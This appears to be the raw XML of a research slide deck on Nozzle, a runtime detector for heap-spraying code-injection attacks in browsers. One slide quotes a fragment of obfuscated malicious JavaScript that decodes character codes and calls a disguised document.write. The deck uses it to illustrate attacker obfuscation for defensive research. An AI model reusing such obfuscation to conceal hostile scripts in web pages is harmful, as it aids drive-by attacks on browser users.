              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>JaL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>].split('-');</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>wjXuhgDA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HwnJ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>[0]*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>ymseWXvItL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>)+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HwnJ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>[1]);</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>wjXuhgDA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wjXuhgDA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>)/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>tZvoA;uoj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>CbjsbW</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>wjXuhgDA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>-(0x29+0x1f-0x2))+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>uoj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>;}if( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>uoj.charCodeAt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>( uoj.length-1) == 0)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>uoj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>uoj.substring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>(0, uoj.length-1);return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>uoj.replace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>(/^\s+|\s+$/g, '');}function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>aIir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>izkBTgqd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>){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ojJ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>=7,KUwyNopmh=2;var </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>HthytAE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>='462-0,',MICmoDx=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>HthytAE.split</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>(',');</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>TMgXPXCr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>='';function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>kmzL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>(c){return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>String.fromCharCode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>(c);}for(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>hCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>=(MICmoDx.length-1);</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>hCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>&gt;=(0x8-0x8-0x0);</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>hCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>-=0x22+0x1f-0x2c-0x14){ TZQW=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>MICmoDx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>hCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>].split('-');</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>vnvZfS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(TZQW[0]*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>KUwyNopmh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>)+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>parseInt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>(TZQW[1]);</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>vnvZfS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>parseInt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>vnvZfS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>)/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>ojJ;TMgXPXCr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>kmzL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>vnvZfS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>-(0x1c+0x19+0x11))+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>TMgXPXCr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>;}if( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>TMgXPXCr.charCodeAt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>( TMgXPXCr.length-1) == 0)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>TMgXPXCr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>TMgXPXCr.substring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>(0, TMgXPXCr.length-1);return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>TMgXPXCr.replace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>(/^\s+|\s+$/g, '');}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TxgayUqhNB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>ZCLTWYUnb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>OBrA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>')+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>Gyj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>mEYkoDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>')+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>xjAZB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>FbqQ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>')+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>aIir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>rMIV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>'); </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>jgUOu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>document;jgUOu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>['2655wr1994i7859t7987e40275181'.replace(/[0-9]/g,'')](</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>TxgayUqhNB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>);function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>ktHtntgSO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>JTrde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>){ 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mgu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>document.getElementById</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>ebRg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>'); } </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>gYNYJts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>YFc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>){ 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Kitkja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>=new Function("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>FnhAIh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>", "return 883734;"); } </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>cymmhIYk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>qdbc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>){ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>mKRKEps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>document.getElementById</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>uAwG</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>'); }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5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Kittens of Doom</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="0" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>What data can you trust?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Heap spraying is quite general, easy to implement</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Many applications allow scripts in type safe languages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>JavaScript, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ActionScript</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Java, C#</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Many applications accept data from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>untrusted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> sources</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Embed malicious code</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> in images, documents, DLLs, etc.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Sotirov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> &amp; Dowd BH’08]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D1453-4CAE-459E-B186-079CC19DEE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4412980" cy="29455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Nozzle – Runtime Heap Spraying Detection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 2" descr="C:\pmax\main\ndure\nozzle\paper\data\econ_vs_exp-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1186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38200" y="617220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Logical time (number of allocations/frees)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553998" cy="3798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Normalized Surface Area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981200"/>
            <a:ext cx="196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Malicious Site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1687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Normal Site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6172200" y="5181600"/>
            <a:ext cx="332232" cy="381000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0066FF" mc:Ignorable=""/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0066FF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4443984" y="2033016"/>
            <a:ext cx="332232" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="CC00FF" mc:Ignorable=""/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="CC00FF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1219200"/>
            <a:ext cx="396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Application: Web Browser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2057400"/>
            <a:ext cx="3465949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Nozzle answers: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How much of my heap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 suspicious?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6626B-2CA8-4A5D-B1ED-3706ED98910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1547</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>329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Nozzle:  A Defense Against Heap-spraying  Code Injection Attacks</vt:lpstr>
      <vt:lpstr>Heap Spraying is a Problem</vt:lpstr>
      <vt:lpstr>Drive-By Heap Spraying</vt:lpstr>
      <vt:lpstr>Drive-By Heap Spraying (2)</vt:lpstr>
      <vt:lpstr>Drive-By Heap Spraying (3)</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Obfuscation to the Rescue</vt:lpstr>
      <vt:lpstr>Kittens of Doom What data can you trust?</vt:lpstr>
      <vt:lpstr>Nozzle – Runtime Heap Spraying Detection</vt:lpstr>
      <vt:lpstr>Outline</vt:lpstr>
      <vt:lpstr>Nozzle Design</vt:lpstr>
      <vt:lpstr>Local Malicious Object Detection</vt:lpstr>
      <vt:lpstr>Object Surface Area Calculation (1)</vt:lpstr>
      <vt:lpstr>Object Surface Area Calculation (2)</vt:lpstr>
      <vt:lpstr>Nozzle Global Heap Metric</vt:lpstr>
      <vt:lpstr>Nozzle Experimental Summary</vt:lpstr>
      <vt:lpstr>Nozzle on Benign Sites</vt:lpstr>
      <vt:lpstr>Nozzle with Known Heap Sprays</vt:lpstr>
      <vt:lpstr>Nozzle Runtime Overhead</vt:lpstr>
      <vt:lpstr>Using Nozzle in Adobe Reader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Zorn</dc:creator>
  <cp:lastModifiedBy>Ben Livshits</cp:lastModifiedBy>
  <cp:revision>127</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2009-08-06T17:30:43Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2010-04-01T01:20:26Z</dcterms:modified>
</cp:coreProperties>
</file>